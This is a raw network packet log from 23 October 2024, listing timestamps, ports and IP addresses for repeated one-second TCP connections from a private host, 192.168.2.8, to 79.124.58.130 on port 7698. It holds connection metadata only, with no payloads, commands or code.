Oct 23, 2024 17:26:37.524082899 CEST	7698	49766	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:37.524132013 CEST	49767	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:37.524158955 CEST	49766	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:37.524421930 CEST	49767	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:37.529750109 CEST	7698	49767	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:38.433073044 CEST	7698	49767	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:38.433749914 CEST	49767	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:38.550164938 CEST	49767	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:38.550725937 CEST	49768	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:38.556860924 CEST	7698	49768	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:38.556874037 CEST	7698	49767	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:38.556977034 CEST	49768	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:38.557003021 CEST	49767	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:38.557356119 CEST	49768	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:38.562761068 CEST	7698	49768	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:39.436939001 CEST	7698	49768	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:39.437139034 CEST	49768	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:39.549444914 CEST	49768	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:39.549777031 CEST	49769	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:39.555166960 CEST	7698	49769	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:39.555289984 CEST	49769	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:39.555394888 CEST	49769	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:39.555500984 CEST	7698	49768	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:39.555553913 CEST	49768	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:39.560697079 CEST	7698	49769	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:40.442514896 CEST	7698	49769	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:40.442631960 CEST	49769	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:40.549376011 CEST	49769	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:40.549648046 CEST	49770	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:40.555547953 CEST	7698	49769	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:40.555572987 CEST	7698	49770	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:40.555655003 CEST	49770	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:40.555804014 CEST	49770	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:40.559331894 CEST	49769	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:40.561137915 CEST	7698	49770	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:41.458522081 CEST	7698	49770	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:41.458635092 CEST	49770	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:41.565124989 CEST	49770	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:41.565561056 CEST	49771	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:41.570837021 CEST	7698	49770	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:41.570899010 CEST	49770	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:41.571007967 CEST	7698	49771	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:41.571074009 CEST	49771	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:41.571196079 CEST	49771	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:41.577018976 CEST	7698	49771	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:42.472769022 CEST	7698	49771	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:42.475434065 CEST	49771	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:42.580672026 CEST	49771	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:42.580912113 CEST	49772	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:42.586280107 CEST	7698	49772	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:42.586358070 CEST	49772	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:42.586525917 CEST	7698	49771	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:42.586532116 CEST	49772	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:42.586569071 CEST	49771	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:42.591973066 CEST	7698	49772	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:43.476623058 CEST	7698	49772	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:43.479443073 CEST	49772	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:43.582510948 CEST	49773	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:43.583439112 CEST	49772	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:43.588146925 CEST	7698	49773	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:43.588213921 CEST	49773	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:43.588315010 CEST	49773	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:43.589428902 CEST	7698	49772	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:43.591440916 CEST	49772	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:43.593709946 CEST	7698	49773	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:44.485373974 CEST	7698	49773	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:44.485482931 CEST	49773	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:44.596195936 CEST	49773	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:44.596638918 CEST	49774	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:44.601986885 CEST	7698	49773	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:44.602019072 CEST	7698	49774	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:44.602071047 CEST	49773	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:44.602121115 CEST	49774	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:44.602278948 CEST	49774	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:44.607592106 CEST	7698	49774	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:45.500189066 CEST	7698	49774	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:45.500310898 CEST	49774	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:45.612493038 CEST	49775	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:45.612502098 CEST	49774	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:45.618305922 CEST	7698	49775	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:45.618319988 CEST	7698	49774	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:45.618377924 CEST	49775	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:45.618407965 CEST	49774	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:45.618558884 CEST	49775	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:45.627471924 CEST	7698	49775	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:46.504832029 CEST	7698	49775	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:46.504944086 CEST	49775	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:46.611922979 CEST	49775	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:46.612287045 CEST	49776	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:46.617980957 CEST	7698	49775	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:46.618045092 CEST	49775	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:46.618345976 CEST	7698	49776	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:46.618519068 CEST	49776	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:46.618519068 CEST	49776	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:46.623884916 CEST	7698	49776	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:47.538832903 CEST	7698	49776	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:47.538918972 CEST	49776	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:47.643151999 CEST	49776	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:47.643531084 CEST	49777	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:47.649019003 CEST	7698	49777	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:47.649167061 CEST	7698	49776	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:47.649195910 CEST	49777	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:47.649234056 CEST	49776	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:47.649406910 CEST	49777	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:47.654683113 CEST	7698	49777	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:48.531480074 CEST	7698	49777	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:48.531586885 CEST	49777	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:48.673402071 CEST	49777	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:48.678621054 CEST	49778	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:48.678859949 CEST	7698	49777	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:48.679704905 CEST	7698	49777	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:48.679758072 CEST	49777	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:48.684201002 CEST	7698	49778	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:48.684277058 CEST	49778	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:48.716360092 CEST	49778	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:48.722054958 CEST	7698	49778	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:49.566737890 CEST	7698	49778	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:49.566807032 CEST	49778	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:49.676724911 CEST	49778	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:49.677052975 CEST	49779	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:49.682399988 CEST	7698	49779	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:49.682506084 CEST	49779	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:49.682638884 CEST	49779	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:49.683357954 CEST	7698	49778	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:49.683403969 CEST	49778	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:49.688649893 CEST	7698	49779	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:50.580481052 CEST	7698	49779	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:50.580699921 CEST	49779	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:50.690059900 CEST	49779	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:50.690397978 CEST	49780	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:50.695866108 CEST	7698	49779	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:50.695969105 CEST	49779	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:50.695986986 CEST	7698	49780	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:50.696057081 CEST	49780	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:50.700125933 CEST	49780	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:50.705432892 CEST	7698	49780	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:51.594413042 CEST	7698	49780	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:51.594679117 CEST	49780	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:51.705960989 CEST	49780	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:51.706288099 CEST	49782	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:51.711838007 CEST	7698	49782	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:51.712097883 CEST	49782	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:51.712124109 CEST	7698	49780	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:51.712182045 CEST	49782	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:51.713494062 CEST	49780	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:51.717770100 CEST	7698	49782	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:52.623183966 CEST	7698	49782	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:52.623325109 CEST	49782	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:52.737236977 CEST	49782	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:52.737595081 CEST	49783	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:52.743050098 CEST	7698	49783	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:52.743164062 CEST	7698	49782	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:52.743220091 CEST	49782	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:52.743272066 CEST	49783	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:52.743442059 CEST	49783	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:52.749300957 CEST	7698	49783	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:53.633927107 CEST	7698	49783	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:53.633985043 CEST	49783	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:53.736980915 CEST	49783	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:53.737338066 CEST	49785	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:53.742993116 CEST	7698	49785	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:53.743136883 CEST	49785	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:53.743293047 CEST	49785	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:53.746810913 CEST	7698	49783	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:53.746886015 CEST	49783	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:53.748663902 CEST	7698	49785	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:54.642301083 CEST	7698	49785	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:54.642432928 CEST	49785	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:54.752520084 CEST	49785	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:54.752885103 CEST	49786	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:54.758671045 CEST	7698	49785	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:54.758749008 CEST	49785	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:54.759640932 CEST	7698	49786	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:54.759712934 CEST	49786	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:54.759890079 CEST	49786	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:54.765350103 CEST	7698	49786	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:55.652183056 CEST	7698	49786	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:55.652251005 CEST	49786	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:55.770076036 CEST	49786	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:55.770402908 CEST	49787	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:55.777339935 CEST	7698	49787	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:55.777424097 CEST	49787	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:55.777584076 CEST	49787	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:55.777673960 CEST	7698	49786	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:55.777724981 CEST	49786	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:55.784096956 CEST	7698	49787	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:56.696655989 CEST	7698	49787	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:56.696738005 CEST	49787	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:56.816740990 CEST	49787	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:56.817214966 CEST	49788	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:56.822671890 CEST	7698	49787	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:56.822694063 CEST	7698	49788	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:56.822752953 CEST	49787	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:56.822786093 CEST	49788	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:56.822954893 CEST	49788	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:56.828272104 CEST	7698	49788	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:57.723676920 CEST	7698	49788	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:57.724368095 CEST	49788	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:57.870943069 CEST	7698	49788	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:57.871457100 CEST	49788	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:57.901973009 CEST	49788	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:57.902400970 CEST	49789	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:57.907489061 CEST	7698	49788	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:57.907850981 CEST	7698	49789	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:57.907922029 CEST	49789	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:57.908837080 CEST	49789	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:57.914290905 CEST	7698	49789	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:58.789858103 CEST	7698	49789	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:58.789964914 CEST	49789	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:58.910738945 CEST	49789	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:58.911184072 CEST	49790	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:58.916490078 CEST	7698	49789	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:58.916553020 CEST	49789	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:58.916766882 CEST	7698	49790	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:58.916980028 CEST	49790	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:58.916980028 CEST	49790	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:58.922982931 CEST	7698	49790	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:59.808693886 CEST	7698	49790	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:59.808898926 CEST	49790	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:59.926198959 CEST	49790	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:59.926583052 CEST	49791	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:59.933638096 CEST	7698	49790	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:59.933655977 CEST	7698	49791	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:59.933763981 CEST	49791	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:59.933768034 CEST	49790	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:59.933952093 CEST	49791	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:59.939687967 CEST	7698	49791	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:00.825464964 CEST	7698	49791	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:00.825530052 CEST	49791	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:00.942491055 CEST	49791	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:00.942820072 CEST	49792	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:00.948260069 CEST	7698	49791	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:00.948285103 CEST	7698	49792	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:00.948304892 CEST	49791	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:00.948354006 CEST	49792	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:00.948488951 CEST	49792	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:00.954056025 CEST	7698	49792	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:01.841455936 CEST	7698	49792	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:01.841568947 CEST	49792	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:01.957376003 CEST	49792	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:01.957789898 CEST	49793	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:01.963145018 CEST	7698	49793	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:01.963228941 CEST	49793	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:01.963376045 CEST	7698	49792	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:01.963418961 CEST	49793	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:01.963500023 CEST	49792	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:01.968852043 CEST	7698	49793	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:02.863456011 CEST	7698	49793	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:02.863554001 CEST	49793	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:03.010324955 CEST	7698	49793	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:03.010611057 CEST	49793	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:03.299462080 CEST	49794	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:03.299468994 CEST	49793	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:03.304972887 CEST	7698	49793	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:03.304986000 CEST	7698	49794	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:03.307667971 CEST	49794	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:03.319458961 CEST	49794	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:03.324769020 CEST	7698	49794	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:04.189384937 CEST	7698	49794	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:04.189467907 CEST	49794	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:04.301914930 CEST	49794	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:04.302467108 CEST	49795	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:04.308186054 CEST	7698	49795	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:04.308264017 CEST	49795	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:04.308532000 CEST	49795	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:04.309437990 CEST	7698	49794	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:04.309500933 CEST	49794	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:04.313934088 CEST	7698	49795	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:05.200920105 CEST	7698	49795	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:05.200999975 CEST	49795	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:05.317631006 CEST	49796	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:05.317637920 CEST	49795	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:05.323535919 CEST	7698	49795	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:05.323652029 CEST	7698	49796	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:05.323877096 CEST	49796	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:05.323877096 CEST	49796	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:05.323936939 CEST	49795	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:05.329564095 CEST	7698	49796	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:06.224095106 CEST	7698	49796	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:06.224172115 CEST	49796	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:06.333353996 CEST	49796	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:06.333740950 CEST	49797	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:06.339164972 CEST	7698	49796	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:06.339238882 CEST	49796	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:06.339543104 CEST	7698	49797	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:06.339632034 CEST	49797	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:06.339885950 CEST	49797	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:06.345274925 CEST	7698	49797	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:07.227108002 CEST	7698	49797	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:07.227453947 CEST	49797	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:07.351908922 CEST	49797	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:07.351911068 CEST	49798	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:07.359503984 CEST	7698	49798	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:07.359540939 CEST	7698	49797	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:07.359652042 CEST	49797	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:07.359683037 CEST	49798	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:07.359879971 CEST	49798	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:07.366838932 CEST	7698	49798	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:08.266129971 CEST	7698	49798	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:08.266185999 CEST	49798	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:08.380405903 CEST	49798	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:08.381879091 CEST	49799	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:08.386646032 CEST	7698	49798	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:08.386698961 CEST	49798	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:08.387332916 CEST	7698	49799	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:08.387392044 CEST	49799	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:08.387722015 CEST	49799	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:08.393440962 CEST	7698	49799	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:09.268672943 CEST	7698	49799	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:09.269675016 CEST	49799	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:09.395322084 CEST	49800	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:09.395323038 CEST	49799	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:09.400823116 CEST	7698	49800	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:09.400949955 CEST	49800	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:09.401037931 CEST	7698	49799	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:09.401101112 CEST	49799	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:09.401104927 CEST	49800	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:09.406465054 CEST	7698	49800	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:10.322798014 CEST	7698	49800	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:10.322900057 CEST	49800	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:10.442761898 CEST	49800	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:10.443260908 CEST	49801	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:10.448523998 CEST	7698	49800	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:10.448574066 CEST	49800	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:10.448780060 CEST	7698	49801	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:10.448858023 CEST	49801	7698	192.168.2.8	79.124.58.130
